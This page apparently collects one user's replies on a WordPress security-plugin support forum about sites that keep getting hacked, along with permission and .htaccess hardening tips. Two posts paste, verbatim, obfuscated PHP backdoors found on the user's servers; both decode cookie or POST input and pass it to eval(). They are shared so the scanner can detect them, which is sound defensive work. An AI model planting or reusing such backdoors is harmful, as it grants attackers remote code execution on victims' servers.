Steven Baron

Forum Replies Created

Viewing 10 posts - 1 through 10 (of 10 total)
  • Author
    Posts
  • in reply to: Grandson #2328

    Steven Baron
    Member

    Saw you post about your grandson being in the hospital.  Wishing him a speedy recovery :)   Do me a favor send me an email at my registered email address…

    • This topic was modified 5 years, 4 months ago by  Steven Baron.
    in reply to: Core File Changes #2327

    Steven Baron
    Member

    Any chance you can make the core file scan/restore to defaults a CRON job option so it is just automatic?

    in reply to: NEW Version 4.18.52 #2198

    Steven Baron
    Member

    I see you have included a database scanner :)

     

    Thank you for the continued development!!!

    in reply to: Interesting detection… #2184

    Steven Baron
    Member

    Is that a session code that expires?  The majority of my issues are injection related…

    in reply to: Interesting detection… #2182

    Steven Baron
    Member

    Scan found this location:

    wp-content/plugins/gotmls/safe-load/_SESSION/.GOTMLS.69d73f2d111e766c58bafc8c8846db83.php

     

    Had this code:

    <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $w9f53 = 265;$GLOBALS['vae0'] = Array();global $vae0;$vae0 = $GLOBALS;${“\x47\x4c\x4fB\x41\x4c\x53″}['m55bc753'] = “\x3d\x3e\x41\x22\x21\x3c\x7a\x5d\x63\x3b\x2e\x65\x4d\x72\x48\x69\x2a\x4c\x6f\x6a\x59\x73\x70\x47\x57\x36\x46\x24\x7d\x49\x32\xa\x56\x4e\x5c\x2c\x9\x43\x40\x4a\x27\x58\x4f\x35\x6b\x44\x31\x5e\x30\x5b\x51\x4b\x20\x6d\x34\x7e\x2d\x52\x71\x26\x7b\x6e\x5a\x37\x2f\x25\x60\xd\x78\x76\x66\x42\x50\x23\x29\x2b\x62\x28\x55\x38\x5f\x3f\x79\x61\x7c\x6c\x54\x45\x67\x74\x39\x77\x64\x3a\x53\x68\x75\x33″;$vae0[$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][8].$vae0['m55bc753'][97].$vae0['m55bc753'][76]] = $vae0['m55bc753'][8].$vae0['m55bc753'][95].$vae0['m55bc753'][13];$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]] = $vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][92];$vae0[$vae0['m55bc753'][58].$vae0['m55bc753'][76].$vae0['m55bc753'][25].$vae0['m55bc753'][43]] = $vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]] = $vae0['m55bc753'][21].$vae0['m55bc753'][89].$vae0['m55bc753'][13].$vae0['m55bc753'][85].$vae0['m55bc753'][11].$vae0['m55bc753'][61];$vae0[$vae0['m55bc753'][11].$vae0['m55bc753'][92].$vae0['m55bc753'][92].$vae0['m55bc753'][46]] = $vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][11].$vae0['m55bc753'][92];$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]] = $vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][15].$vae0['m55bc753'][80].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][89];$vae0[$vae0['m55bc753'][76].$vae0['m55bc753'][76].$vae0['m55bc753'][54].$vae0['m55bc753'][90].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][48]] = $vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][15].$vae0['m55bc753'][83].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][6].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][92].$vae0['m55bc753'][25].$vae0['m55bc753'][8].$vae0['m55bc753'][25]] = $vae0['m55bc753'][22].$vae0['m55bc753'][95].$vae0['m55bc753'][22].$vae0['m55bc753'][69].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][21].$vae0['m55bc753'][15].$vae0['m55bc753'][18].$vae0['m55bc753'][61];$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][8].$vae0['m55bc753'][92].$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][76]] = $vae0['m55bc753'][96].$vae0['m55bc753'][61].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][15].$vae0['m55bc753'][83].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][6].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][43]] = $vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][25].$vae0['m55bc753'][54].$vae0['m55bc753'][80].$vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][8].$vae0['m55bc753'][18].$vae0['m55bc753'][92].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][79].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][43].$vae0['m55bc753'][48].$vae0['m55bc753'][83]] = $vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][89].$vae0['m55bc753'][80].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][11].$vae0['m55bc753'][80].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][15].$vae0['m55bc753'][89];$vae0[$vae0['m55bc753'][44].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11].$vae0['m55bc753'][92]] = $vae0['m55bc753'][88].$vae0['m55bc753'][43].$vae0['m55bc753'][92].$vae0['m55bc753'][90].$vae0['m55bc753'][76].$vae0['m55bc753'][97].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]] = $vae0['m55bc753'][68].$vae0['m55bc753'][83].$vae0['m55bc753'][90].$vae0['m55bc753'][79];$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][43].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][92]] = $_POST;$vae0[$vae0['m55bc753'][69].$vae0['m55bc753'][8].$vae0['m55bc753'][30].$vae0['m55bc753'][48].$vae0['m55bc753'][11].$vae0['m55bc753'][97].$vae0['m55bc753'][70]] = $_COOKIE;@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][13].$vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][80].$vae0['m55bc753'][85].$vae0['m55bc753'][18].$vae0['m55bc753'][88], NULL);@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][85].$vae0['m55bc753'][18].$vae0['m55bc753'][88].$vae0['m55bc753'][80].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][13].$vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][21], 0);@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][53].$vae0['m55bc753'][83].$vae0['m55bc753'][68].$vae0['m55bc753'][80].$vae0['m55bc753'][11].$vae0['m55bc753'][68].$vae0['m55bc753'][11].$vae0['m55bc753'][8].$vae0['m55bc753'][96].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][18].$vae0['m55bc753'][61].$vae0['m55bc753'][80].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][11], 0);@$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][79].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][43].$vae0['m55bc753'][48].$vae0['m55bc753'][83]](0);if (!$vae0[$vae0['m55bc753'][11].$vae0['m55bc753'][92].$vae0['m55bc753'][92].$vae0['m55bc753'][46]]($vae0['m55bc753'][2].$vae0['m55bc753'][17].$vae0['m55bc753'][57].$vae0['m55bc753'][87].$vae0['m55bc753'][2].$vae0['m55bc753'][45].$vae0['m55bc753'][20].$vae0['m55bc753'][80].$vae0['m55bc753'][57].$vae0['m55bc753'][78].$vae0['m55bc753'][33].$vae0['m55bc753'][80].$vae0['m55bc753'][97].$vae0['m55bc753'][25].$vae0['m55bc753'][25].$vae0['m55bc753'][83].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][97].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][76].$vae0['m55bc753'][30].$vae0['m55bc753'][46].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][46].$vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][46].$vae0['m55bc753'][83].$vae0['m55bc753'][48].$vae0['m55bc753'][30].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][83])){$vae0[$vae0['m55bc753'][58].$vae0['m55bc753'][76].$vae0['m55bc753'][25].$vae0['m55bc753'][43]]($vae0['m55bc753'][2].$vae0['m55bc753'][17].$vae0['m55bc753'][57].$vae0['m55bc753'][87].$vae0['m55bc753'][2].$vae0['m55bc753'][45].$vae0['m55bc753'][20].$vae0['m55bc753'][80].$vae0['m55bc753'][57].$vae0['m55bc753'][78].$vae0['m55bc753'][33].$vae0['m55bc753'][80].$vae0['m55bc753'][97].$vae0['m55bc753'][25].$vae0['m55bc753'][25].$vae0['m55bc753'][83].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][97].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][76].$vae0['m55bc753'][30].$vae0['m55bc753'][46].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][46].$vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][46].$vae0['m55bc753'][83].$vae0['m55bc753'][48].$vae0['m55bc753'][30].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][83], 1);$r613 = NULL;$a3f6d19 = NULL;$vae0[$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][11].$vae0['m55bc753'][46].$vae0['m55bc753'][92].$vae0['m55bc753'][54].$vae0['m55bc753'][43]] = $vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][97].$vae0['m55bc753'][30].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][56].$vae0['m55bc753'][92].$vae0['m55bc753'][97].$vae0['m55bc753'][48].$vae0['m55bc753'][70].$vae0['m55bc753'][56].$vae0['m55bc753'][54].$vae0['m55bc753'][76].$vae0['m55bc753'][8].$vae0['m55bc753'][54].$vae0['m55bc753'][56].$vae0['m55bc753'][90].$vae0['m55bc753'][76].$vae0['m55bc753'][8].$vae0['m55bc753'][90].$vae0['m55bc753'][56].$vae0['m55bc753'][63].$vae0['m55bc753'][70].$vae0['m55bc753'][8].$vae0['m55bc753'][25].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][30].$vae0['m55bc753'][83].$vae0['m55bc753'][63].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11];global $cee1d45;function  xa98($r613, $x2871b){global $vae0;$fa85fe5d = “”;for ($t2fa871b7=0; $t2fa871b7<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($r613);){for ($sd312=0; $sd312<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($x2871b) && $t2fa871b7<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($r613); $sd312++, $t2fa871b7++){$fa85fe5d .= $vae0[$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][8].$vae0['m55bc753'][97].$vae0['m55bc753'][76]]($vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]]($r613[$t2fa871b7]) ^ $vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]]($x2871b[$sd312]));}}return $fa85fe5d;}function  g5d9b3e($r613, $x2871b){global $vae0;global $cee1d45;return $vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]]($vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]]($r613, $cee1d45), $x2871b);}foreach ($vae0[$vae0['m55bc753'][69].$vae0['m55bc753'][8].$vae0['m55bc753'][30].$vae0['m55bc753'][48].$vae0['m55bc753'][11].$vae0['m55bc753'][97].$vae0['m55bc753'][70]] as $x2871b=>$kd935987e){$r613 = $kd935987e;$a3f6d19 = $x2871b;}if (!$r613){foreach ($vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][43].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][92]] as $x2871b=>$kd935987e){$r613 = $kd935987e;$a3f6d19 = $x2871b;}}$r613 = @$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][8].$vae0['m55bc753'][92].$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][76]]($vae0[$vae0['m55bc753'][44].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11].$vae0['m55bc753'][92]]($vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][43]]($r613), $a3f6d19));if (isset($r613[$vae0['m55bc753'][83].$vae0['m55bc753'][44]]) && $cee1d45==$r613[$vae0['m55bc753'][83].$vae0['m55bc753'][44]]){if ($r613[$vae0['m55bc753'][83]] == $vae0['m55bc753'][15]){$t2fa871b7 = Array($vae0['m55bc753'][22].$vae0['m55bc753'][69] => @$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][92].$vae0['m55bc753'][25].$vae0['m55bc753'][8].$vae0['m55bc753'][25]](),$vae0['m55bc753'][21].$vae0['m55bc753'][69] => $vae0['m55bc753'][46].$vae0['m55bc753'][10].$vae0['m55bc753'][48].$vae0['m55bc753'][56].$vae0['m55bc753'][46],);echo @$vae0[$vae0['m55bc753'][76].$vae0['m55bc753'][76].$vae0['m55bc753'][54].$vae0['m55bc753'][90].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][48]]($t2fa871b7);}elseif ($r613[$vae0['m55bc753'][83]] == $vae0['m55bc753'][11]){eval/*g7d8cc*/($r613[$vae0['m55bc753'][92]]);}exit();}} ?><?php $GLOBALS["GOTMLS"]["logins"]["69d73f2d111e766c58bafc8c8846db83"]=unserialize(base64_decode(“YToxOntzOjM6IkdFVCI7czoxNToiMTUzOTAyOTg2Ni42MDU3Ijt9″));

     

    in reply to: Blocking Injections #2181

    Steven Baron
    Member

    Most of my sites seem to be continually hacked, no matter how many times I scan and clean the files.  Typically it is the uploading of PHP and ICO files along with code injection to existing files.  In an effort to block the injection I am looking at setting custom permissions and wanted some feed back as your thoughts…

    All *.php files set to 544 to avoid writing permission or prevent injection.
    Folders set to 555 and,”wp-upload” to 755.

    The wp-config file would need to be 755 else plugins such as GOTMLS would not be able to write in the brute force code to it.

    I have also been working on a custom htaccess file for the uploads folder.  GOTMLS flags it as a threat for some reason…

    # Only allow the following direct access to the uploads directory
    RewriteCond %{REMOTE_ADDR} !^(?:xxx\.xxx\.xxx\.xxx)
    RewriteCond %{HTTP_HOST} !^localhost$ [NC]
    RewriteCond %{HTTP_REFERER} !^https?://(?:[^.]+\.)?example\.com/ [NC]
    RewriteRule .? http://example.com [L]

    # Disable hotlinking of images
    RewriteCond %{REQUEST_FILENAME} -f
    RewriteCond %{REQUEST_FILENAME} \.(?:jpe?g|png|gif)$ [NC]
    RewriteCond %{HTTP_REFERER} !^(?:https?://(?:[^.]+\.)?example\.com/|$) [NC]
    RewriteRule \.(?:jpe?g|png|gif)$ – [NC,F]

    # Only allow GET and POST request methods

    Deny from all

    For those that do not know what each line does, I’ve broken it down here. By first listing the rule, then following up with a description of what it does:

    # Disable any cgi-scripts and prevent directory browsing
    Options -ExecCGI -Indexes
    This is first to disable any cgi-scripts, it is connected with another rule below. Then it prevents directory listing, viewing, etc.

    # Whitelist the following file extensions
    # This includes the blocking of double extensions using [^.]
    Order Allow,Deny

    Allow from all

    This is the whitelisting of certain file extensions. This is case insensitivity and blocks any double extensions, like something.php.jpg or similar. You must note that if users upload legitimate file extensions with a literal period in the filename, it will also be blocked. This is why it’s always a good idea to incorporate some type of file renaming utility when they upload files.

    # Secure MIME-types

    ForceType image/jpeg

    ForceType image/png

    ForceType image/gif

    in reply to: locked out of website #2174

    Steven Baron
    Member

    I would manually re-upload the WooCommerce plugin.  Alternately you can also disable your plugins which should then allow you to login again and ultimately fix the issue.

    in reply to: Scan potential threats #2170

    Steven Baron
    Member

    Here is an example of 2 .ICO files from different sites that were found once I removed it from the skip files and was caught by the scanner…

    wp-includes/js/thickbox/.bcb5a93b.ico
    wp-content/plugins/skimlinks/.f397826e.ico

    in reply to: Scan potential threats #2169

    Steven Baron
    Member

    There are litterly dozens of these randomly named files that are scattered through out the sites.  The code in each on is very different but seems to use the same base for encryption.  With that it seems that .ICO files are apart of the attack.  I would recommend removing it from the skip files with the following extensions.  Do you want me to send you more code samples for comparison?

    Also in addition to the manual removal request ability on the potential threat location, maybe you should have a submit for evaluation as an option next to the “white list” when you click on the file.  This would save a lot of time reporting and getting the attack code in your hands quicker  If you think it might be miss used then maybe activate that option for users that have donated as it will validate the user and allow a little tighter control.

    in reply to: Scan potential threats #2167

    Steven Baron
    Member

    I have been fighting a continual hack on a bunch of my WP sites.  Then came across your plugin and giving it a shot to see how it works.  So far pretty impressed…

    The majority of the attack seem so be .ICO and .PHP files.  The .ICO are easy as lal I do is a file scan and delete them.  The .PHP seem sot be arbitrary names.  Your scanner picked a bunch up as potential.  For example…

    wp-admin\pv3f8ux4.php contains:

    <?php

    $fqpee = ’4-dcb\’2ypu1tlk763#nmoxav58*seH_0f9igr’;$nueyq = Array();$nueyq[] = $fqpee[29].$fqpee[26];$nueyq[] = $fqpee[17];$nueyq[] = $fqpee[10].$fqpee[0].$fqpee[33].$fqpee[0].$fqpee[14].$fqpee[14].$fqpee[10].$fqpee[10].$fqpee[1].$fqpee[31].$fqpee[22].$fqpee[31].$fqpee[14].$fqpee[1].$fqpee[0].$fqpee[24].$fqpee[10].$fqpee[22].$fqpee[1].$fqpee[4].$fqpee[10].$fqpee[4].$fqpee[0].$fqpee[1].$fqpee[15].$fqpee[25].$fqpee[31].$fqpee[16].$fqpee[32].$fqpee[28].$fqpee[14].$fqpee[6].$fqpee[22].$fqpee[32].$fqpee[4].$fqpee[28];$nueyq[] = $fqpee[3].$fqpee[20].$fqpee[9].$fqpee[18].$fqpee[11];$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[30].$fqpee[36].$fqpee[28].$fqpee[8].$fqpee[28].$fqpee[22].$fqpee[11];$nueyq[] = $fqpee[28].$fqpee[21].$fqpee[8].$fqpee[12].$fqpee[20].$fqpee[2].$fqpee[28];$nueyq[] = $fqpee[27].$fqpee[9].$fqpee[4].$fqpee[27].$fqpee[11].$fqpee[36];$nueyq[] = $fqpee[22].$fqpee[36].$fqpee[36].$fqpee[22].$fqpee[7].$fqpee[30].$fqpee[19].$fqpee[28].$fqpee[36].$fqpee[35].$fqpee[28];$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[12].$fqpee[28].$fqpee[18];$nueyq[] = $fqpee[8].$fqpee[22].$fqpee[3].$fqpee[13];foreach ($nueyq[7]($_COOKIE, $_POST) as $jsipkrj => $gnufbpt){function xbhdvq($nueyq, $jsipkrj, $swvqcr){return $nueyq[6]($nueyq[4]($jsipkrj . $nueyq[2], ($swvqcr / $nueyq[8]($jsipkrj)) + 1), 0, $swvqcr);}function iopoq($nueyq, $bartqre){return @$nueyq[9]($nueyq[0], $bartqre);}function cwrxi($nueyq, $bartqre){$ynhwgv = $nueyq[3]($bartqre) % 3;if (!$ynhwgv) {eval($bartqre[1]($bartqre[2]));exit();}}$gnufbpt = iopoq($nueyq, $gnufbpt);cwrxi($nueyq, $nueyq[5]($nueyq[1], $gnufbpt ^ xbhdvq($nueyq, $jsipkrj, $nueyq[8]($gnufbpt))));}

    Is there any way that if I submit files and code that you can add them to the threat list?  Or is this, just one of those things that will require manual intervention each time? Other suggestions?

    While I can easily navigate to the location it would be nice if the potential threat section had a check box to allow selection and deletion of files.

Viewing 10 posts - 1 through 10 (of 10 total)